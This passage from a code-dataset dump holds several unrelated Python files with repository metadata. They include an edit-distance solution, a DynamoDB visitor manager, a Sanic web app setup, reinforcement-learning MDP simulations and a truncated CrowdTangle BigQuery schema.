Splits\n\nst.subheader(\"Close\")\nst.line_chart(tickerDf.Close)\nst.subheader(\"Volume\")\nst.line_chart(tickerDf.Volume)\n","repo_name":"codermacleod/StockPriceChecker","sub_path":"stock_price_checker.py","file_name":"stock_price_checker.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33496511050","text":"\"\"\"\n(a)(Complete Choice): for every problem instance, at least one\nchoice is consistent with an optimal solution.\n(b) (Inductive Structure): for each initial choice ck, show that\nmaking choice c leaves one or more strictly smaller subproblems\nwith no external constraints relative to ck.\n(c) (Optimal Substructure): for each initial choice ck, if its induced\nsubproblems are solved optimally, then combining their\nsolutions with choice ck yields a solution that is optimal among\nall solutions that make choice ck.\n\nKey is to find the recurrence function\n\nDescription\n______________\nGiven two words word1 and word2, find the minimum number of steps required to convert word1 to word2. (each operation is counted as 1 step.)\n\nYou have the following 3 operations permitted on a word:\n\na) Insert a character\nb) Delete a character\nc) Replace a character\n\nApproach\n________________\nDefine X[i....j] and Y[i.....j] as the two substrings of X and Y\nDefine D(i, j) as the minimum distance between X and Y to the index i and j\n\neg. X = abcd Y = abcde\n\n | \"\" |a |b |\n--|----|--|--|---------\n\"\"| | | |\n--|----|--|--|--------\na | | | |\n--|----|--|--|---------\nStart at empty string\n\n\nInitialization/Base Case\n=====================\n\nD(i,0) = i\nD(0, j)= j\n\nrecurrence\n=====================\nD(i,j) = min (\n\n D(i-1, j) + 1,\n D(i, j-1) + 1,\n D(i-1, j-1) (+1 if X[i] == X[j] else 0)\n)\n\n\nComplexity\n_____________________\nSpace: m*n\nTime : O(m*n)\n\n\"\"\"\n \n\nclass Solution(object):\n\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n m = len(word1) + 1\n n = len(word2) + 1\n DP = [[0 for _ in range(n)]for _ in xrange(m)]\n\n for i in xrange(m):\n for j in xrange(n):\n if i == 0:\n DP[i][j] = j\n elif j == 0:\n DP[i][j] = i\n else:\n if word1[i - 1] == word2[j - 1]:\n cost = 0\n else:\n cost = 1\n DP[i][j] = min(DP[i - 1][j] + 1, DP[i][j - 1] + 1, DP[i - 1][j - 1] + cost)\n return DP[m - 1][n - 1]\n","repo_name":"ZhengyangXu/Classified","sub_path":"9.Dynmaic_Programming/9.1_L72_Edit_Distance.py","file_name":"9.1_L72_Edit_Distance.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8175046089","text":"import matplotlib.pyplot as plt\nimport random\n\n# Größe der karierten Oberfläche\nGRID_SIZE = 1000\n\n# Anzahl der Vierecke\nNUM_RECTANGLES = 1000\n\n# Definition der Legende\nlegend = {\n 'Wohngebäude': 'green',\n 'Bürogebäude': 'blue',\n 'Geschäft': 'red',\n 'Park': 'yellow',\n 'Schule': 'orange'\n}\n\ndef generate_city():\n # Erstellen einer leeren karierten Oberfläche\n grid = [[' ' for _ in range(GRID_SIZE)] for _ in range(GRID_SIZE)]\n\n # Generieren der Vierecke\n rectangles = []\n for _ in range(NUM_RECTANGLES):\n # Zufällige Position und Größe des Vierecks\n x = random.randint(0, GRID_SIZE - 1)\n y = random.randint(0, GRID_SIZE - 1)\n width = random.randint(1, GRID_SIZE - x)\n height = random.randint(1, GRID_SIZE - y)\n\n # Zufällige Auswahl eines Elements aus der Legende\n label = random.choice(list(legend.keys()))\n\n # Ausmalen des Vierecks auf der karierten Oberfläche\n for i in range(y, y + height):\n for j in range(x, x + width):\n grid[i][j] = label\n \n rectangles.append((x, y, width, height, label))\n\n # Darstellung der karierten Oberfläche\n for row in grid:\n print(' '.join(row))\n\n # Zeichnen der Legende, falls mindestens ein Viereck generiert wurde\n if rectangles:\n labels = [r[4] for r in rectangles]\n colors = [legend[label] for label in labels]\n\n dummy_x = [0] * len(colors) # Dummy-Koordinaten\n dummy_y = [0] * len(colors) # Dummy-Koordinaten\n\n plt.scatter(dummy_x, dummy_y, color=colors, label=labels)\n plt.legend()\n plt.show()\n\n# Aufrufen der Funktion zur Generierung der Stadt\ngenerate_city()","repo_name":"DerFinnredstone/workplace","sub_path":"Code/python/city-generator.py","file_name":"city-generator.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17290552252","text":"\"\"\"\nYour module description\n\"\"\"\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.exceptions import ClientError\nimport logging\n\ndef get_visitor(faceid):\n\tdb_resource = boto3.resource('dynamodb')\n\tvisitors_table = db_resource.Table('Visitors')\n\tresponse = visitors_table.scan(FilterExpression = Attr('faceid').eq(faceid))\n\tprint(\"visitor response: \", response)\n\tvisitor = response['Items']\t\n\treturn visitor\n\ndef update_status(visitor_in):\n faceid = visitor_in['faceid']\n approval_status = 'approved'\n visitor = get_visitor(faceid)\n if len(visitor)>0:\n visitor = visitor[0]\n db_resource = boto3.resource('dynamodb')\n visitors_table = db_resource.Table('Visitors')\n #update status\n try:\n response_as = visitors_table.update_item(\n Key={\n 'faceid': faceid,\n },\n UpdateExpression=\"set approval_status=:approval_status\",\n ExpressionAttributeValues={\n ':approval_status': approval_status\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n \n response_ph = visitors_table.update_item(\n Key={\n 'faceid': faceid,\n },\n UpdateExpression=\"set phone_number=:phone_number\",\n ExpressionAttributeValues={\n ':phone_number': visitor_in['phone_number']\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n \n response_na = visitors_table.update_item(\n Key={\n 'faceid': faceid,\n },\n UpdateExpression=\"set visitor_name=:visitor_name\",\n ExpressionAttributeValues={\n ':visitor_name': visitor_in['visitor_name']\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n \n except ClientError as e:\n logging.error(e)\n return False\n return [response_as, response_ph, response_na]\n\ndef delete_visitor(faceid):\n db_resource = boto3.resource('dynamodb')\n visitors_table = db_resource.Table('Visitors')\n visitors = get_visitor(faceid)\n if len(visitors)>0:\n visitor = visitors[0]\n #delete\n try:\n db_response = visitors_table.delete_item(Key={'faceid': faceid})\n print('deleted:', db_response)\n \n s3 = boto3.resource('s3')\n for item in visitor['photos']:\n s3_response = s3.Object(item['bucket'], item['objectKey']).delete()\n \n rek = boto3.client('rekognition')\n collectionId = 'faceCollection'\n rek_response = rek.delete_faces(CollectionId=collectionId,FaceIds=[faceid])\n \n print(\"RESPONSES:\", db_response,s3_response,rek_response)\n \n except ClientError as e:\n logging.error(e)\n print('couldnt delete item from db,s3, or rekognition')\n return False\n return True\n \n \n \n \n \n \n \n \n","repo_name":"virenbajaj/SmartDoor","sub_path":"Server/Lambda/OwnerAuthentication-LF3/dbMethods.py","file_name":"dbMethods.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30552174173","text":"# Run instructions defined in a file to simulate a simple assembly program\n\ndef read_file(filename):\n values = []\n with open(filename, 'r') as f:\n for line in f:\n values.append(line.strip())\n\n return values\n\n\nif __name__ == \"__main__\":\n print(\"Starting Day 25-1\")\n values = read_file('input.txt')\n\n start_a = 0\n while True:\n # First, setup the registers and starting instruction index\n regs = {'a':start_a, 'b':0, 'c':0, 'd':0}\n index = 0\n\n # Iterate through the program, only stopping once index is outside the bounds of the program\n output = \"\"\n while 0 <= index < len(values) and len(output) < 100:\n instruction = values[index].split()\n # New this time, we need to check to make this is a valid instruction, so check in each part\n if instruction[0] == \"cpy\":\n if instruction[2] not in regs:\n # Skip since the second argument is not a register\n index += 1\n continue\n if instruction[1] in regs:\n regs[instruction[2]] = regs[instruction[1]]\n else:\n regs[instruction[2]] = int(instruction[1])\n elif instruction[0] == \"inc\":\n if instruction[1] not in regs:\n # Skip since the argument is not a register\n index += 1\n continue\n # Increment the register by one\n regs[instruction[1]] += 1\n elif instruction[0] == \"dec\":\n if instruction[1] not in regs:\n # Skip since the argument is not a register\n index += 1\n continue\n # Decrement the register by one\n regs[instruction[1]] -= 1\n elif instruction[0] == \"jnz\":\n if (instruction[1] not in regs and int(instruction[1]) != 0) or \\\n (instruction[1] in regs and regs[instruction[1]] != 0):\n if instruction[2] in regs:\n index += regs[instruction[2]]\n else:\n index += int(instruction[2])\n continue\n elif instruction[0] == \"tgl\":\n # New this time, toggle function changes other functions\n if instruction[1] in regs:\n target = index + regs[instruction[1]]\n else:\n target = index + int(instruction[1])\n if target < 0 or target >= len(values):\n # Out of bounds target, so ignore\n index += 1\n continue\n if \"cpy\" in values[target]:\n values[target] = values[target].replace(\"cpy\", \"jnz\")\n elif \"jnz\" in values[target]:\n values[target] = values[target].replace(\"jnz\", \"cpy\")\n elif \"inc\" in values[target]:\n values[target] = values[target].replace(\"inc\", \"dec\")\n elif \"dec\" in values[target]:\n values[target] = values[target].replace(\"dec\", \"inc\")\n elif \"tgl\" in values[target]:\n values[target] = values[target].replace(\"tgl\", \"inc\")\n elif instruction[0] == \"out\":\n # New to this final iteration, it just outputs whatever the number or register is\n if instruction[1] in regs:\n output += str(regs[instruction[1]])\n else:\n output += str(instruction[1])\n\n # Default increment the index by 1\n index += 1\n\n print(\"Final register values are: {0}\".format(regs))\n print(\"The output pattern is: {0}\".format(output))\n\n passes = True\n for index in range(len(output)):\n if index % 2 != int(output[index]):\n passes = False\n break\n\n if passes:\n break\n else:\n start_a += 1\n\n print(\"The winning start value for a is: {0!s}\".format(start_a))\n","repo_name":"theknoxinator/AoC","sub_path":"2016/Day25/day25-1.py","file_name":"day25-1.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2369329379","text":"\"\"\"Tests for custody_tracker.py.\"\"\"\n# %% Imports\nfrom __future__ import annotations\n\n# Third Party Imports\nfrom numpy import array, ndarray\nfrom numpy.random import rand\n\n# Punch Clock Imports\nfrom punchclock.common.custody_tracker import ( # CovarianceCustody,; TrPosCov,\n CustodyTracker,\n DebugCustody,\n MaxPosStd,\n TrCov,\n)\n\n# %% Test custody functions\nprint(\"\\nTest DebugCustody...\")\nfuncDebug = DebugCustody(num_targets=2)\ncustody = funcDebug.update(array([1, 0]))\nprint(f\"custody = {custody}\")\n\nprint(\"\\nTest checkPosStdCustody...\")\nfuncMaxPosStd = MaxPosStd()\ncustody = funcMaxPosStd(rand(2, 6, 6), 0.5)\nprint(f\"custody = {custody}\")\n\ntest_cov = rand(2, 6, 6)\nfuncTrPosCov = TrCov(pos_vel=\"pos\")\ncustody = funcTrPosCov(test_cov, 0.5)\nprint(f\"custody = {custody}\")\n\nfuncTrPosCov = TrCov(pos_vel=\"vel\")\ncustody = funcTrPosCov(test_cov, 0.5)\nprint(f\"custody = {custody}\")\n\n# %% Test Class\nprint(\"\\nTest CustodyTracker...\")\n# test with defaults\nct = CustodyTracker(3)\ncustody = ct.update(obs=rand(3, 6, 6))\nprint(f\"custody = {custody}\")\n\n# Test with custom config, supported func\nct = CustodyTracker(\n num_targets=3,\n config={\n \"func\": \"max_pos_std\",\n \"threshold\": 0.5,\n },\n)\ncustody = ct.update(obs=rand(3, 6, 6))\nprint(f\"custody = {custody}\")\n\ncustody = ct.update(obs=rand(3, 6, 6), return_map=True)\nprint(f\"custody = {custody}\")\n\n\n# Test with custom func\ndef customCustodyFunc(x: ndarray, b: bool) -> list[bool]:\n \"\"\"Test function.\"\"\"\n return [b for i in range(x.shape[0])]\n\n\nct = CustodyTracker(num_targets=3, config={\"func\": customCustodyFunc})\ncustody = ct.update(obs=rand(3, 6, 6), b=False)\nprint(f\"custody = {custody}\")\n\n# %% Test class with debug func\nprint(\"\\nTest CustodyTracker with DEbugCustody...\")\nct = CustodyTracker(\n num_targets=2,\n config={\"func\": DebugCustody(num_targets=2).update},\n)\nct.update(obs=array([1, 0]))\n# %% done\nprint(\"done\")\n","repo_name":"dylan906/clockpunch","sub_path":"tests/common/test_custody_tracker.py","file_name":"test_custody_tracker.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70155614596","text":"import pandas as pd\n\nPOPULATION_DATA_PATH = '/Users/eduardovillani/git/data-visualization-20201/data/population/pop_per_year_per_country.xls'\n\n\ndef population_data():\n return pd.read_excel(POPULATION_DATA_PATH)\n\n\ndef get_pop_by_year(year, drop_na=True):\n if drop_na:\n data = population_data().dropna()\n else:\n data = population_data()\n data = data[['Country Name',\n 'Country Code',\n str(year)]]\n data = data.rename(columns={str(year): f\"{str(year)}_pop\", \"Country Code\": \"code_pop\"})\n return data[[f'{str(year)}_pop', 'code_pop']]\n","repo_name":"ed-villani/data-visualization-20201","sub_path":"charts/population/population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13742391078","text":"# FreeRT - app.py\nfrom sanic import Sanic, response, Request\nfrom sanic.exceptions import SanicException\n\nfrom sanic_mysql import ExtendMySQL\nfrom orjson import dumps, loads\nfrom miko.manager import Manager\n\nfrom data import Secret\n\nfrom typing import Union\n\nfrom os.path import exists\nfrom sys import argv\n\nPATH = template_folder = \"rt-frontend\"\nclass TypedSanic(Sanic):\n pass\n\n\ndef l(tag: str=\"div\", extends: str=\"\", class_: str=\"\", **kwargs) -> str:\n \"複数言語対応用\"\n return \"\".join(\n f'<{tag} class=\"language {key} {class_}\" {extends} hidden>{value}'\n for key, value in kwargs.items()\n )\n\ndef cl(text: Union[str, dict[str, str]]) -> str:\n \"渡されたやつが辞書ならlに渡す。\"\n return l(**text) if isinstance(text, dict) else text\n\ndef layout(title: str, description: str, content: str, head: str=\"\"):\n \"一般のHTMLをレンダリングする関数です。\"\n title = cl(title)\n description = cl(description)\n content = cl(content)\n return gapp.ctx.env.render(\n f\"{template_folder}/layout.html\", content=content,\n head=f\"\"\"{title}\n \n {head}\"\"\", _=l\n )\n\n\ndef setup_app(app: TypedSanic):\n global gapp\n app.ctx.mysql = ExtendMySQL(app, **Secret[\"mysql\"])\n app.ctx.env = app.ctx.miko = Manager(\n extends={\n \"layout\": layout,\n \"app\": app,\n \"loads\": loads,\n \"dumps\": dumps,\n \"l\": l\n }\n )\n gapp = app\n async def _template(path: str, **kwargs):\n kwargs[\"app\"] = app\n return response.html(await app.ctx.miko.aiorender(\"{}{}\".format(PATH, path), **kwargs))\n app.ctx.template = app.ctx.render = _template\n app.ctx.canary = argv[1] == \"canary\"\n \n @app.on_request\n async def response_content(request: Request):\n if (request.server_name == \"localhost\"\n or request.server_name == \"free-rt.com\"):\n if request.path == \"/\":\n return await app.ctx.template(\"/index.html\", eloop=app.loop, _=l)\n if exists(f\"{PATH}{request.path}\"):\n if request.path.endswith(\".html\"):\n return await app.ctx.template(request.path, eloop=app.loop, _=l)\n else:\n return await response.file(f\"{PATH}{request.path}\")\n else:\n raise SanicException(\"あれ?ここどこだ?真っ白な壁がずっと続いているよ\", status_code=404)\n\n @app.exception(Exception)\n async def on_error(request: Request, exception: Exception):\n if request.status == 404:\n return response.json({}, message=\"ここには何もないよ\", status=404)\n","repo_name":"SakuraProject/rewrite-rt-backend","sub_path":"core/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35580432595","text":"from typing import Optional\n\nfrom armarx_core import slice_loader\n\nslice_loader.load_armarx_slice(\"RobotAPI\", \"aron.ice\")\nslice_loader.load_armarx_slice(\"RobotAPI\", \"armem/memory.ice\")\n\nfrom armarx import aron\nfrom armarx import armem\n\n\ndef get_latest_data(\n entity: armem.data.Entity,\n instance_index=0,\n) -> \"aron.AronData\":\n snapshot: armem.data.EntitySnapshot = list(entity.history.values())[-1]\n instance: armem.data.EntityInstance = snapshot.instances[instance_index]\n return instance.data\n\n\ndef find_entity_by_name(\n name: str,\n core_segment: armem.data.CoreSegment,\n) -> Optional[armem.data.Entity]:\n # Find class\n for prov_name, prov in core_segment.providerSegments.items():\n for entity_name, entity in prov.entities.items():\n if entity_name == name:\n return entity\n return None\n","repo_name":"markusgrotz/python3-armarx","sub_path":"armarx_memory/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14727369613","text":"try:\n import cv2\nexcept ImportError:\n print(\"ERROR python-opencv must be installed\")\n exit(1)\nfrom bh1750 import readLight\nimport datetime\nimport pandas as pd\nimport time\nfrom buffercleaner import *\n\ncap = cv2.VideoCapture(2)\n#cap = cv2.VideoCapture(1)\ncap_cleaner = CameraBufferCleanerThread(cap)\n\nif not cap.isOpened():\n print(\"Camera not found!\")\n exit(1)\n\n#cap.set(3,640)\n#cap.set(4,480)\nprint(f\"Resolution : {cap.get(3)}x{cap.get(4)}\")\nprint(f\"FPS : {cap.get(5)}\")\n\ncv2.namedWindow(\"C920\", cv2.WINDOW_NORMAL | cv2.WINDOW_AUTOSIZE)\nprint(\"Running, ESC or Ctrl-c to exit...\")\ni = 0\ncount = []\nwhile True:\n start = time.time()\n ret, img = cap.read()\n if ret == False:\n print(\"Error reading image\")\n break\n\n img = cv2.flip(img,-1)\n #print(img.shape)\n cv2.imshow(\"C920\", img)\n k = cv2.waitKey(27) # cam 27\n #print(k)\n now = datetime.datetime.now()\n now_time = now.strftime(\"%m%d_%H%M%S\")\n print(now_time)\n count.append([now_time,readLight()])\n dirname = '/home/pi/Socket/images/sunset'\n \n fname = dirname +'/'+now_time+'.jpg'\n print(fname)\n cv2.imwrite(fname,img)\n\n if k == 109: # k = m\n f = f'sample{i}.jpg'\n cv2.imwrite(f,img)\n print(f'sample{i}.jpg saved')\n print(f'Light = {readLight()}')\n i +=1\n elif k == ord('t'):\n print(f'Light = {readLight()}')\n if k == 27: # 20fps\n df = pd.DataFrame(count)\n \n df.to_csv(f\"Light.csv\",mode = 'a', index=False, header=None)\n \n break\n end = time.time()\n delay = 60-(start-end)\n time.sleep(delay)\ncv2.destroyAllWindows()\ncap_cleaner.raise_exception()\ncap_cleaner.join()\ncap.release()","repo_name":"yunguks/Socket","sub_path":"camtest_light.py","file_name":"camtest_light.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39995932966","text":"def fatorial(valor, show=False):\r\n resu = 1\r\n mostra = ''\r\n for i in range(valor, 0, -1):\r\n resu *= i\r\n mostra += f' {i} *'\r\n if show:\r\n mostra = mostra[1:-1]\r\n mostra += f'= {resu}'\r\n return resu, mostra\r\n else:\r\n return resu\r\n\r\n\r\nprint(fatorial(valor=12, show=True))\r\n","repo_name":"AllexThiagoSR/Portifolio_python","sub_path":"curso_em_video/ex102.py","file_name":"ex102.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20879617563","text":"from loadMDP import loadMDP\nfrom simulator import simulator\nfrom random import randint\nfrom policies import policySelector\nimport parking_MDP\nfrom agnets import MCagent, SARSAagent, QLagent\nfrom plot import generatePlot\n\n\ndef run_policy_simulation(filename, policy, beta, numOfEpisodes, maxSteps, pOfParkingRandom, terminalState = None):\n\n mdp = loadMDP(filename)\n res = simulation(mdp, policy, beta = beta, numOfEpisodes = numOfEpisodes, maxSteps = maxSteps, pOfParkingRandom = pOfParkingRandom, terminalState = terminalState)\n resf.write(\"**********\" + filename[: -4] + \"[policy: \" + policy + \"]\" + (\" (p = \" + str(pOfParkingRandom) + \")\" if \"parking\" in filename else \"\") + \"*********\\n\")\n resf.write(\"Average reward: \" + str(res) + \"\\n\")\n resf.write(\"*********************************************\\n\\n\")\n\n\ndef simulation(mdp, policy, beta = 0.9, numOfEpisodes = 100, maxSteps = 100, pOfParkingRandom = 0.9, terminalState = None):\n rewards = 0\n p = policySelector(policy)\n # print(p)\n for _ in range(numOfEpisodes):\n rewards += eachSimulation(mdp, p, beta, maxSteps, pOfParkingRandom, terminalState)\n\n averageR = rewards / numOfEpisodes\n return averageR\n\ndef eachSimulation(mdp, p, beta, maxSteps, pOfParkingRandom, terminalState):\n _, A, _, _ = mdp\n steps = 0\n cs = 0\n reward = 0\n sim = simulator(mdp, currentS = cs,terminalS = terminalState)\n while steps < maxSteps:\n res = sim.takeAction(p(mdp,cs, p = pOfParkingRandom))\n if res == \"end\":\n break\n elif res == \"illegal\":\n steps -= 1\n else:\n r, cs = res\n reward += (beta ** steps) * r\n steps += 1\n return reward\n\ndef funRL(agent, filename, epsilon, beta, N, terminalS = None):\n mdp = loadMDP(filename)\n if agent == \"MCagent\":\n return MCagent(mdp, epsilon, beta, N, terminalS).learningAndEvaluation()\n elif agent == \"SARSAagent\":\n return SARSAagent(mdp, epsilon, beta, N, terminalS).learningAndEvaluation()\n elif agent == \"QLagent\":\n return QLagent(mdp, epsilon, beta, N, terminalS).learningAndEvaluation()\n\ndef main():\n \n \n run_policy_simulation(\"mdp_test.txt\", \"random\", 0.8, 300, 300, 0.9, terminalState = 4)\n\n run_policy_simulation(\"parking_mdp1.txt\", \"parkingRandomPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp1.txt\", \"parkingRandomPolicy\", 1, 200, 300, 0.9)\n run_policy_simulation(\"parking_mdp2.txt\", \"parkingRandomPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp2.txt\", \"parkingRandomPolicy\", 1, 200, 300, 0.9)\n\n run_policy_simulation(\"parking_mdp1.txt\", \"parkingAvoidingOccupuiedPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp1.txt\", \"parkingAvoidingOccupuiedPolicy\", 1, 200, 300, 0.9)\n run_policy_simulation(\"parking_mdp2.txt\", \"parkingAvoidingOccupuiedPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp2.txt\", \"parkingAvoidingOccupuiedPolicy\", 1, 200, 300, 0.9)\n\n run_policy_simulation(\"parking_mdp1.txt\", \"parkingSimpleImpovementPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp1.txt\", \"parkingSimpleImpovementPolicy\", 1, 200, 300, 0.9)\n run_policy_simulation(\"parking_mdp2.txt\", \"parkingSimpleImpovementPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp2.txt\", \"parkingSimpleImpovementPolicy\", 1, 200, 300, 0.9)\n resf.close()\n print(\"25%\")\n \n N = 1\n N2 = 50\n # N3 = 50000\n \n x11, y11 = funRL(\"MCagent\", \"mdp_test.txt\", 0.05, 0.8, N, terminalS = 4)\n x12, y12 = funRL(\"SARSAagent\", \"mdp_test.txt\", 0.05, 0.8, N, terminalS = 4)\n x13, y13 = funRL(\"QLagent\", \"mdp_test.txt\", 0.05, 0.8, N, terminalS = 4)\n generatePlot(x11, y11, x12, y12, x13, y13, \"mdp_test (e = 0.05)\")\n print(\"generted plot\")\n print(\"40%\")\n x21, y21 = funRL(\"MCagent\", \"mdp_test.txt\", 0.3, 0.8, N, terminalS = 4)\n x22, y22 = funRL(\"SARSAagent\", \"mdp_test.txt\", 0.3, 0.8, N, terminalS = 4)\n x23, y23 = funRL(\"QLagent\", \"mdp_test.txt\", 0.3, 0.8, N, terminalS = 4)\n generatePlot(x21, y21, x22, y22, x23, y23, \"mdp_test (e = 0.3)\")\n print(\"generted plot\")\n print(\"55%\")\n x31, y31 = funRL(\"MCagent\", \"parking_mdp1.txt\", 0.05, 0.999, N2)\n x32, y32 = funRL(\"SARSAagent\", \"parking_mdp1.txt\", 0.05, 0.999, N2)\n x33, y33 = funRL(\"QLagent\", \"parking_mdp1.txt\", 0.05, 0.999, N2)\n generatePlot(x31, y31, x32, y32, x33, y33, \"parking_mdp1 (e = 0.05)\")\n print(\"generted plot\")\n print(\"70%\")\n x41, y41 = funRL(\"MCagent\", \"parking_mdp1.txt\", 0.3, 0.999, N2)\n x42, y42 = funRL(\"SARSAagent\", \"parking_mdp1.txt\", 0.3, 0.999, N2)\n x43, y43 = funRL(\"QLagent\", \"parking_mdp1.txt\", 0.3, 0.999, N2)\n generatePlot(x41, y41, x42, y42, x43, y43, \"parking_mdp1 (e = 0.3)\")\n print(\"generted plot\")\n print(\"80%\")\n x51, y51 = funRL(\"MCagent\", \"parking_mdp2.txt\", 0.05, 0.999, N2)\n x52, y52 = funRL(\"SARSAagent\", \"parking_mdp2.txt\", 0.05, 0.999, N2)\n x53, y53 = funRL(\"QLagent\", \"parking_mdp2.txt\", 0.05, 0.999, N2)\n generatePlot(x51, y51, x52, y52, x53, y53, \"parking_mdp2 (e = 0.05)\")\n print(\"generted plot\")\n print(\"90%\")\n x61, y61 = funRL(\"MCagent\", \"parking_mdp2.txt\", 0.3, 0.999, N2)\n x62, y62 = funRL(\"SARSAagent\", \"parking_mdp2.txt\", 0.3, 0.999, N2)\n x63, y63 = funRL(\"QLagent\", \"parking_mdp2.txt\", 0.3, 0.999, N2)\n generatePlot(x61, y61, x62, y62, x63, y63, \"parking_mdp2 (e = 0.3)\")\n print(\"generted plot\")\n print(\"100%\")\n \n \n\nresf = open(\"results/resultOfPolicySimulation.txt\", 'w')\nmain()\n\n\n","repo_name":"SuerpX/CS533","sub_path":"HW4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70974196355","text":"\"\"\"Schema adapted from https://github.com/CrowdTangle/API/wiki/Post. Kept in case we decide to write\nCrowdtangle data to Big Query in the future.\"\"\"\nCROWDTANGLE_BIGQUERY_SCHEMAS = {\n 'accounts' : {\n \"description\": \"See account https://github.com/CrowdTangle/API/wiki/Account\",\n \"name\": \"accounts\",\n \"type\": \"RECORD\",\n \"mode\": \"REQUIRED\",\n \"fields\": [\n {\n \"description\": \"The unique identifier of the account in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform on which the account exists.\",\n \"name\": \"id\",\n \"type\": \"INT64\",\n \"mode\": \"PRIMARY_KEY\"\n },\n {\n \"description\": \"For Facebook only. Options are facebook_page, facebook_profile, facebook_group.\",\n \"name\": \"accountType\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The handle or vanity URL of the account.\",\n \"name\": \"handle\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The name of the account.\",\n \"name\": \"name\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The ISO country code of the the country from where the plurality of page administrators operate.\",\n \"name\": \"pageAdminTopCountry\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The platform on which the account exists. enum (facebook, instagram, reddit)\",\n \"name\": \"platform\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The platform's ID for the account. This is not shown for Facebook public users.\",\n \"name\": \"platformId\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"A URL pointing at the profile image.\",\n \"name\": \"profileImage\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The number of subscribers/likes/followers the account has. By default, the subscriberCount property will show page Followers (as of January 26, 2021). You can select either Page Likes or Followers in your Dashboard settings. https://help.crowdtangle.com/en/articles/4797890-faq-measuring-followers.\",\n \"name\": \"subscriberCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"A link to the account on its platform.\",\n \"name\": \"url\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Whether or not the account is verified by the platform, if supported by the platform. If not supported, will return false.\",\n \"name\": \"verified\",\n \"type\": \"BOOLEAN\",\n \"mode\": \"REQUIRED\"\n }\n ]\n },\n 'posts': {\n \"description\": \"A post object represents a single post from any of the supported platforms (e.g., Facebook, Instagram).\",\n \"name\": \"posts\",\n \"type\": \"RECORD\",\n \"mode\": \"REQUIRED\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"id\",\n \"type\": \"STRING\",\n \"mode\": \"PRIMARY_KEY\"\n },\n {\n \"description\": \"See account https://github.com/CrowdTangle/API/wiki/Account\",\n \"name\": \"account_id\",\n \"type\": \"INT64\",\n \"mode\": \"REQUIRED\",\n },\n {\n \"description\": \"See account https://github.com/CrowdTangle/API/wiki/Account . This field is only present for Facebook Page posts where there is a sponsoring Page.\",\n \"name\": \"brandedContentSponsor_account_id\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\",\n },\n {\n \"description\": \"The user-submitted text on a post.\",\n \"name\": \"message\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"name\": \"title\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The platform on which the post was posted. E.g., Facebook, Instagram, etc. enum (facebook, instagram, reddit)\",\n \"name\": \"platform\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The platform's ID for the post.\",\n \"name\": \"platformId\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The URL to access the post on its 